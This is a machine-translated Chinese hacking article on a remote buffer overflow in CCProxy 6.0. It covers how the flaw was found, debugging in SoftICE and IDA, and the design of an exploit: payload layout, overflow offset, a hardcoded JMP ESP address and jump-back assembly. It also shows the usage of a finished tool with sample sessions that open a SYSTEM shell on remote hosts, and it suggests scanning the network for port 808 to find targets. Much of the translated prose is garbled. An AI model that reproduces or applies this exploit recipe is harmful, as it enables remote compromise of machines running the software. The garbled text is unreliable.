How did I find out the research of ccproxy remote Overflow vulnerability

Ccproxy is a home-grown proxy server software that supports proxy protocols such as HTTP, FTP, Gopher, SOCKS4/5, Telnet, Secure (HTTPS), News (NNTP), RTSP, and MMS. Because of its easy to use, user-friendly interface, very suitable for the traffic requirements of the network environment is not high, so there are a lot of primary network management like using this software, sometimes I use it to do the internet agent. Some days ago I tested that there were multiple buffer overflow vulnerabilities in the Ccproxy 6.0 version that could cause an attacker to execute arbitrary code remotely.

TIPS: What is Gopher, RTSP, MMS?
Gopher is a very famous information lookup system on the Internet that organizes files on the Internet into some sort of index, easily bringing users from one place on the internet to another. Allows users to use cascading structure of menus and files to discover and retrieve information, which has the world's largest and most magical catalogue.
RTSP is the real tranfer stream protocol abbreviation, translated as a real-time transmission stream protocol, used to transmit streaming media files on the network, such as RM movie files, and so on, its download method please read "Quietly download streaming media."
MMS is the abbreviation of Multimedia Messaging service, Chinese translation for multimedia information Services, its biggest feature is the support of multimedia functions, can be GPRS, CDMA 1X support, WAP Wireless application protocol for the carrier transmission of video clips, pictures, sounds and text, MMS is even one of the MMS protocols.

Vulnerability discovery Process
In fact, it is very accidental to find this loophole, when considering the company's products black box test solution, I would like to use the template + test case to the network part of the boundary test. This is the comparison of the traditional black box test method, its core content is to divide the network protocol packet, and then work out the various blocks of the test strategy, and finally according to the strategy of all blocks gradually tested. The advantage of this test approach is that it effectively controls the test progress, and can test all parts of a network protocol in more detail, and adds new test cases to the testing process to refine the test plan. The test program can be written using a scripting language or C.

TIPS: What is a black box test?
The black box test method regards the program as a black box, regardless of the internal structure and process of the program. Black-Box testing is a test in the program interface, it only checks whether the program function can be used in accordance with the specifications of the normal use, whether the program can properly receive input data to produce the correct output information, and maintain the integrity of external information. Black-Box testing is also called functional testing.

This is the way I test the company's products, exactly at that time between the company's internal network using Ccproxy as proxy server, because the test HTTP protocol to pass this agent, so the test process found that ccproxy collapsed, and therefore found this loophole, it is a coincidence.

Vulnerability Analysis Process
The Ccproxy HTTP proxy port defaults to 808, and the port can be changed in its interface. The principle of the vulnerability is simple, that is, the Ccproxy HTTP proxy port to send the URL more than 4056 bytes of malformed request, Ccproxy will occur stack overflow. It was later found that more than just a GET request had this problem, all post and head requests would also cause an overflow. This problem is also found in the Ccproxy telnet agent after analyzing its principle.
Now let me elaborate on the process of analyzing this vulnerability. After discovering that sending an oversized request can cause a ccproxy error, you begin analyzing the overflow points and exploiting the restrictions. The tools to use are the SoftICE debugger and the IDA disassembly tool.

TIPS: Many people know the use of windasm disassembly, but the disassembly of the code is very simple, it is not easy to see, but Ida is not the same, it will not only disassemble the program, and will try to analyze the program, and add the corresponding comments. Because of this, IDA's disassembly of a large program can take a very long time.

The entire debugging analysis vulnerability process is as follows: First in SoftICE the next breakpoint: Bpx ntdll! Kiuserexceptiondispatcher, this command means that the program runs to the Ntdll.dll in the Kiuserexceptiondispatcher to stop, to softice for processing. Kiuserexceptiondispatcher This function is a very important step in the process of Windows exception handling, it is responsible for distributing all the exceptions that occur in the user's layer space to the exception handling function in the chain, which is called whenever an exception occurs in the user-layer space. SoftICE is not loaded Ntdll.dll by default, so we can load the DLL file with a load exports of a tool called Symbol Loader in the DriverStudio suite.
Once the breakpoint is set, send a simple program to the 808 port "get/aaaa[..." 4056 bytes] http/1.0< a long string, such as carriage return >< return >, that contains an extra long URL of 4,056 a. After sending SoftICE will jump out and stop on the Kiuserexceptiondispatcher breakpoint, and then use the "DD (* (esp+4)) +b8" command to view the EIP address when the error occurred, This is because the function parameter of the kiuserexceptiondispatcher is a structure that points to the register at the time the exception occurred, and the structure saves the register value from the position of the offset 0x8c, and its specific save register value is as follows:
0x08c Gs
0x090 Fs
0x094 Es
0x098 Ds
0x09c Edi
0X0A0 Esi
0X0A4 EBX
0X0A8 EDX
0X0AC ECX
0x0b0 Eax
0X0B4 EBP
0x0b8 Eip
0X0BC Cs
0X0C0 EFlags
0X0C4 ESP
0x0c8 Ss
The "DD (* (esp+4)) +b8" command found that the EIP was 0x41414141, and we know that 0x41 is the ASCII code of a, so we have now confirmed that the very long string we sent has covered the return address of a function. Causes the function to return to an address such as 0x41414141. When you exit SoftICE, the 0x41414141 instruction references 0x41414141 memory. The memory cannot be read. "Such an Application error dialog box.

TIPS: The 0x41414141 directive refers to 0x41414141 memory. The memory cannot be read. "This is a typical overflow hint that explicitly tells us about the overflow address and error and is good for further analysis of the overflow."

Next, we need to know exactly what caused the function return address to be overwritten. So we gradually reduce the length of the string being sent, and we find that when we send 4039 bytes, we do not cause an error. Because the stack and the return address are overwritten, we cannot see where the address that caused the overflow is, but empirically, this could be an overflow caused by functions such as strcpy, strcat, or sprintf. So we break the breakpoint in these functions and then send the 4056-byte long URL command again. But the discovery did not interrupt these functions, proving that the overflow process did not call these functions.
There seems to be no good way to determine the overflow location, but by observing the stack content after the overflow, you can see that the "AAAA ..." and the opening time and the "Unknown Web" string, according to the current stack, are known, When writing to these addresses on the stack, the return address is overwritten, so we set a write breakpoint directly on the stack address and use the command "BPMD 01977908 W" To set a write breakpoint on the address of 0x01977908, which we obtained by observing the ESP after the overflow occurred. , because this should be the ESP after the function returns, that is, the top address of the stack. But this address is not fixed, it may be different on the system, this address is not the same, even on the same system, this address with the start of each ccproxy process is different. But on the same system, we usually use the same address a few times, so we just need to try a few more times to be able to break down. You must first use addr Ccproxy to enter the Ccproxy process address space before you set a breakpoint.
After careful analysis, it turns out that the stack operation will be done before calling 0040a410 this function, and this stack will just write the function return address to the stack 01977908 position, so we have reason to believe that the process of calling the 0040a410 function caused the overflow. By setting a breakpoint at the 0040A410 function entry and then sending an overflow string, you can see the address that is returned to the 0x41414141 by pressing F12 (that is, execution to the function return) after the interruption, which confirms our assumption that the overflow does occur in the 0040a410 function.
Then we use IDA to disassemble CCProxy.exe to see what the 0040a410 function does. The disassembly code is as follows:
text:0040a410 sub_40a410 proc near; CODE xref:sub_408a10+114 P
. text:0040a410; sub_408a10+262 p ...
. text:0040a410 mov eax, 280Ch
. text:0040a415 call __alloca_probe allocating buffers of 0x280c size
. text:0040a41a mov eax, dword_501d04
. text:0040a41f Push EBP
. text:0040a420 mov ebp, [esp+2814h]; This is the content to be recorded, passed as a parameter
You can see that this function calls the "__alloca_probe" function for buffer allocation, and it is a bit different from the way ordinary functions call sub esp,xxx to allocate a buffer because the buffer that needs to be allocated is too large, and direct subtraction of ESP may result in the direct arrival of the unassigned address space. So we need to use "__alloca_probe" to allocate this large buffer.
We continue to trace this function, and the return address of the function is overwritten when the 0040a607 instruction is found. The code is as follows:
. TEXT:0040A5F1 Lea ECX, [esp+414h]
. TEXT:0040A5F8 Push EBP
. TEXT:0040A5F9 push ECX
. TEXT:0040A5FA Lea edx, [esp+1820h]
. text:0040a601 push offset ass_0; ' [%s]%s '
. text:0040a606 Push EdX
. text:0040a607 Call _sprintf
In this call to the "_sprintf" function, stored in the format of the "[Date] content" in the 0x1820 size of the local string buffer, because there is no limit length, so caused a buffer overflow. Again carefully see the "_sprintf" function is implemented in Ccproxy own code snippet, and did not call the "Msvcrt.dll" exported sprintf function, no wonder we have in front of the sprintf function breakpoint did not intercept!
By the way, some of the anti-overflow software products in the market now use the Intercept system's string copy function and then backtrack the stack, and claim to fundamentally solve the problem of system buffer overflow. This is nonsense, because many of the overflow is the software's own code implementation caused overflow, such as the ccproxy overflow so that no system functions are invoked, so that protection method does not fundamentally solve the overflow problem.
When the 0040a410 function returns, it returns to the overwritten address. The code is as follows:
. text:0040a700 add ESP, 280Ch; recovery stack
. text:0040a706 Retn; return
As we can see here, the 0040a410 function is actually a function that records the Ccproxy log, which records the log in the format of the [date] content, but does not limit the length when constructing the log string, resulting in a buffer overflow. We've found the location that caused the overflow, and then we'll see how we can exploit the vulnerability.

Vulnerability utilization
To exploit the vulnerability, you must find a string offset that overrides the return address. We can send aaaabbbbccccddd by sending ... Such a combination string looks at exactly where the return address is overwritten. After some analysis, it is learned that at 4056 of the offset is exactly the cover of the function return address. So we're going to design an overflow string like this:
GET/AAAA....|SHELLCODE|JMP esp|jmp back| http/1.0
where "AAAA ..." such strings are designed to free up enough space before the shellcode is executed because the CPU instruction for the letter A is the INC ECX, an impractical instruction equivalent to the traditional NOP instruction, but its advantage over the NOP instruction is that it is a character that can be displayed, Not easy to cause errors. And Shellcode is a common opening mouth of the shellcode, no special requirements for the characters. JMP ESP is an address that contains the JMP ESP directive as the return address of the overriding function, so that when the function returns, it jumps to the address to execute the JMP ESP instruction, because the ESP at this point points to the address behind the return address of the function, the subsequent Jmp back instruction. This instruction is a string of jump instructions that are used to skip the JMP ESP address and Shellccode, execute to the previous AAAA ..., that is, the NOP instruction, in order to finally execute into Shellcode. Here we want to choose a more common jmp esp address, if it is the system DLL in the JMP ESP address, may be different with the system with different SPS, so we choose 0X7FFA54CD address, it in the same class of Windows system (for example, Chinese version Windows 2000) is fixed. Jmp back instructs us to use such assembler instructions:
mov ecx,25414141h; set ECX as 0x25414141
SHR ecx,14h ecx Right 0x14 bit, let ECX become 0x254
Sub esp,ecx; subtract esp from 0x254
JMP ESP; skip to esp at this time
By subtracting the ESP from the 0x254, you can skip the previous return address and shellcode so that you can jump to the NOP command in front of the shellcode to execute it.
This design is good overflow string, and write program to ensure that JMP esp exactly cover the return address, send, and indeed overflow successfully, and out of the shellcode specified port. So exploit is not even done? So I went to the outside to find a ccproxy to install a chicken to try, but did not succeed. Strange, what is the problem?
A careful analysis found that the overflow was caused by copying it into a string in the format of "[Date] content", where the Content section was formatted as follows:
Client IP address < space >unknown< space >Web< space >http request
where unknown and the web are fixed-length strings, HTTP requests are strings that we can control. But there is a problem, that is, the client IP address is a string we can not control, its length is not fixed, so that different lengths of client IP address will lead to different overflow points, which may not be successful overflow. How can we solve this problem? Although we cannot control the string length of the client IP address, we can get the length of this string and make up this length in the HTTP request we can control, so that the JMP ESP address we send is always overwritten on the function return address.
The client IP address may be divided into three different scenarios depending on the structure of the network:
? If the attacker and the target are on the same network segment (that is, the middle without a gateway), then the client IP address is the IP address of the attacker's host.
? If the attacker and the target are not on the same network segment (that is, the middle passes through the gateway), the attacker's host has a real IP address. The client IP address is also the IP address of the attacker's host.
? If the attacker and the target are not on the same network segment (that is, the middle passes through the gateway), and the attacker's host does not have a real IP address. For example, an attacker in the intranet, while attacking the target host extranet, then the client IP address is the attacker's gateway external IP address.
Knowing these three kinds of situations, we can improve the exploit program. First to remove the IP address, you can call the socket function gethostname () First get the local name, and then by calling GetHostByName () to get the hexadecimal value of the native IP address, and finally using Inet_ntoa () Converts this value to a string. This solves the first two cases of the client IP address, then for the third native and the target host is not the same network segment how to do? Using the program to automatically fetch the gateway external IP address seems a little troublesome, I am too lazy to write such a program, simply by the user to enter it, how to get your gateway external IP address will not need me to teach it, it should be not difficult, some of the Web site forum will directly show your IP address, That's the IP address of your gateway.

TIPS: Using gateways to implement overflow attacks is the first time you see concrete examples of how their network traffic is built? How is the data transfer conducted? Interested friends can consider, try to use the process to do something, I believe you will have more discoveries.

How to use the vulnerability attack program
I've written a exploit program in the way mentioned above, using a format such as "CCPX < target ip> [port]", where the target IP is the IP address of the machine that you are going to attack with the Ccproxy installed. The port is a Ccproxy HTTP proxy port on the destination IP, which defaults to 808, but may change.
Then the program will prompt you "is this host IP and target host IP in the same network segment?" "Because of the previous reason, so to take two different overflow strings, if your machine and the target host on the same network segment, then you choose Y, if not the same network segment to select N. If you choose NN, the program will also ask you "this host has no real extranet IP address?", that is, your machine is in the intranet or outside the network, there is no real IP address, if there is a choice of Y, do not choose N. If you choose N this time, then the program will require you to enter the host's gateway to the external IP address, this address needs to find a way to get it, it is not difficult to get it. After entering, the overflow string is successfully sent, and the 24876 port Shellcode is automatically connected, and if successful, the CMD.EXE command line for system privileges appears.
If your machine and target host on the same network segment above that is simple, directly in the first step to select Y can attack success. If your machine does not have the same network segment as the target host, but does have a real IP address, select Y in the second step.
The specific attack process for three different situations is as follows:
1. Your machine and target host are on the same network segment:
D:\SOFT\CCX\CCPX\DEBUG&GT;CCPX 192.168.0.103
Is this host IP in the same network segment as the target host IP? [Y/n]y
[+] Connecting to 192.168.0.103:808
[+] Send Magic buffer ...
[+] connecting to CMD Shell Port ...
Microsoft Windows 5.00.2195 [Version]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\administrator> exit
Exit
[-] Connection closed.
2. Your machine is not on the same network segment as the target host, but it has a real IP address:
D:\SOFT\CCX\CCPX\DEBUG&GT;CCPX 202.xxx.xxx.xxx
Is this host IP in the same network segment as the target host IP? [Y/n]n
Does this host have a real extranet IP address? [Y/n]y
[+] Connecting to 202.xxx.xxx.xxx:808
[+] Send Magic buffer ...
[+] connecting to CMD Shell Port ...
Microsoft Windows 5.00.2195 [Version]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\administrator>exit
Exit
[-] Connection closed.
3. Your machine inside the net, while attacking the target host in the extranet:
D:\SOFT\CCX\CCPX\DEBUG&GT;CCPX 210.xxx.xxx.xxx
Is this host IP in the same network segment as the target host IP? [Y/n]n
Does this host have a real extranet IP address? [Y/n]n
Please enter the external IP address of the gateway to which this host belongs: 202.xx.xx.xx← input is the external IP address of your gateway

[+] Connecting to 210.xxx.xxx.xxx:808
[+] Send Magic buffer ...
[+] connecting to CMD Shell Port ...
Microsoft Windows 5.00.2195 [Version]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\administrator>exit
Exit
[-] Connection closed.
The JMP ESP address in my program is an address in the Chinese version of Windows 2000 that may be different in other versions of the operating system and needs to be modified by the reader.

TIPS: Because this shellcode has a direct opening method, if the reader friend's attack target has a firewall, it may lead to an unsuccessful attack. In this case you need to change the shellcode in the ISNO program, replace it with a reverse connection shellcode and recompile it again. Specific methods please pay attention to the recent "Novice Learning Overflow" column.

Is this the best way to push a jmp ESP address to the return address of a function by filling a different number of a with a different network situation, as mentioned earlier? I think there might be a better way to use some of the internal features of the sprintf function to write a generic utility, but I don't have time to study it, and if the reader is interested in it, you can do it yourself, if you study it, This is also a very practical universal exploit technology.
Later, the study found that ccproxy not only the HTTP agent overflow problem, Telnet agent and some other port calls log functions have the same problem, the attack method is similar, here no longer detailed analysis. In addition, Ccproxy 5.x and previous versions have this vulnerability, but the method of constructing strings is slightly different, so this exploit program cannot successfully attack Ccproxy 5.x and previous versions, only attack Ccproxy 6.0. Readers can study the old version of the ccproxy themselves and write the exploit program.

Conclusion
This vulnerability is not a vulnerability of the Windows operating system itself, but Ccproxy is a more commonly used software in the country, so there are some useful values. No, you can use a port scanner such as super Scan to scan the TCP 808 port on the domestic network, and many times you can find a machine with Ccproxy installed.
In fact, the purpose of writing this article is not to teach you to use this loophole black machine, but to tell you a software vulnerability from discovery to tracking debugging to the last write exploit process is how, perhaps you can also use this method to find some other vulnerabilities.